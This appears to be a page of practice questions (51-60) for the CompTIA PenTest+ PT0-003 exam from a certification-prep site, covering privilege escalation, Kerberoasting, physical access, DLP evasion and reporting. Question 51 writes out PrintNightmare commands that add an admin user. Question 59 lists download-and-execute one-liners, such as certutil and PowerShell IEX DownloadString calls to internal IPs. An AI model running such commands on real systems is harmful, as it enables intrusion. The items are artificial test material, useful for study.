Summer Certification Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: force70

Pass the CompTIA PenTest+ PT0-003 Questions and answers with CertsForce

Viewing page 6 out of 10 pages
Viewing questions 51-60 out of questions
Questions # 51:

During an assessment, a penetration tester manages to get RDP access via a low-privilege user. The tester attempts to escalate privileges by running the following commands:

Import-Module .\PrintNightmare.ps1

Invoke-Nightmare -NewUser " hacker " -NewPassword " Password123! " -DriverName " Print "

The tester attempts to further enumerate the host with the new administrative privileges by using the runas command. However, the access level is still low. Which of the following actions should the penetration tester take next?

Options:

A.

Log off and log on with " hacker " .


B.

Attempt to add another user.


C.

Bypass the execution policy.


D.

Add a malicious printer driver.


Expert Solution
Questions # 52:

An internal penetration tester is on site assessing network access for company-owned mobile devices. Which of the following would be the best tool to identify the available networks?

Options:

A.

Wireshark


B.

theHarvester


C.

Recon-ng


D.

WiGLE.net


Expert Solution
Questions # 53:

A penetration tester presents the following findings to stakeholders:

Control | Number of findings | Risk | Notes

Encryption | 1 | Low | Weak algorithm noted

Patching | 8 | Medium | Unsupported systems

System hardening | 2 | Low | Baseline drift observed

Secure SDLC | 10 | High | Libraries have vulnerabilities

Password policy | 0 | Low | No exceptions noted

Based on the findings, which of the following recommendations should the tester make? (Select two).

Options:

A.

Develop a secure encryption algorithm.


B.

Deploy an asset management system.


C.

Write an SDLC policy.


D.

Implement an SCA tool.


E.

Obtain the latest library version.


F.

Patch the libraries.


Expert Solution
Questions # 54:

Which of the following methods should a physical penetration tester employ to access a rarely used door that has electronic locking mechanisms?

Options:

A.

Lock picking


B.

Impersonating


C.

Jamming


D.

Tailgating


E.

Bypassing


Expert Solution
Questions # 55:

Which of the following techniques is the best way to avoid detection by data loss prevention tools?

Options:

A.

Encoding


B.

Compression


C.

Encryption


D.

Obfuscation


Expert Solution
Questions # 56:

A penetration tester needs to identify all vulnerable input fields on a customer website. Which of the following tools would be best suited to complete this request?

Options:

A.

DAST


B.

SAST


C.

IAST


D.

SCA


Expert Solution
Questions # 57:

Which of the following is within the scope of proper handling and is most crucial when working on a penetration testing report?

Options:

A.

Keeping both video and audio of everything that is done


B.

Keeping the report to a maximum of 5 to 10 pages in length


C.

Basing the recommendation on the risk score in the report


D.

Making the report clear for all objectives with a precise executive summary


Expert Solution
Questions # 58:

During a penetration test, a tester captures information about an SPN account. Which of the following attacks requires this information as a prerequisite to proceed?

Options:

A.

Golden Ticket


B.

Kerberoasting


C.

DCShadow


D.

LSASS dumping


Expert Solution
Questions # 59:

A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?

Options:

A.

powershell.exe impo C:\tools\foo.ps1


B.

certutil.exe -f https://192.168.0.1/foo.exe bad.exe


C.

powershell.exe -noni -encode IEX.Downloadstring( " http://172.16.0.1/ " )


D.

rundll32.exe c:\path\foo.dll,functName


Expert Solution
Questions # 60:

During a preengagement activity with a new customer, a penetration tester looks for assets to test. Which of the following is an example of a target that can be used for testing?

Options:

A.

API


B.

HTTP


C.

IPA


D.

ICMP


Expert Solution
Viewing page 6 out of 10 pages
Viewing questions 51-60 out of questions